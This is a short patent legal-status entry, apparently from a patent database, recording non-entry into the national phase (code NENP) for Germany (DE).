NENP Non-entry into the national phase

Ref country code: DE